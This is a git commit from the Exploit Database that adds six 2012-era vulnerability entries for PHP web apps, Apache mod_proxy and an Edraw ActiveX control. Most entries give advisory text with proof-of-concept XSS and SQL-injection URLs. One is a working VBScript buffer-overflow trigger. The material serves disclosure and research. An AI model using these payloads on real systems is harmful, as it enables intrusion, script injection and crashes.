DB: 2015-04-08

6 new exploits
This commit is contained in:
Offensive Security 2015-04-08 08:36:35 +00:00
parent c7a0ac44ed
commit 9a45389171
8 changed files with 63 additions and 1 deletions

View file

@ -33063,3 +33063,9 @@ id,file,description,date,author,platform,type,port
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection Vulnerability",2012-02-02,"Daniel Godoy",php,webapps,0
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting Vulnerability",2012-02-02,"Red Security TEAM",php,webapps,0
36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Vulnerability",2012-02-02,"BHG Security Center",php,webapps,0
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x 'account-closed.tcl' Cross Site Scripting Vulnerability",2012-02-03,"Michail Poultsakis",php,webapps,0
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0

Can't render this file because it is too large.

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/51869/info
Apache HTTP Server is prone to a security-bypass vulnerability.
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
RewriteRule ^(.*) http://www.example.com$1
ProxyPassMatch ^(.*) http://www.example.com$1

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51803/info
iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51804/info
The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51842/info
project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/register/account-closed?message=[arbitrary-JavaScript]

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51865/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/weblinks.php?weblink_id=[Sql]

20
platforms/windows/dos/36662.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/51866/info
Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
Edraw Diagram Component 5 is vulnerable; other versions may also be affected.
Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid = "EDBoardLib.EDBoard"
argCount = 1
arg1=String(3092, "A")
target.LicenseName = arg1</script>

View file

@ -4,7 +4,7 @@
#[+] Date: 27-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: https://www.internetdownloadmanager.com/
#[+] Vendor: http://www.internetdownloadmanager.com/
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Poc:http://i.imgur.com/7et4xSh.png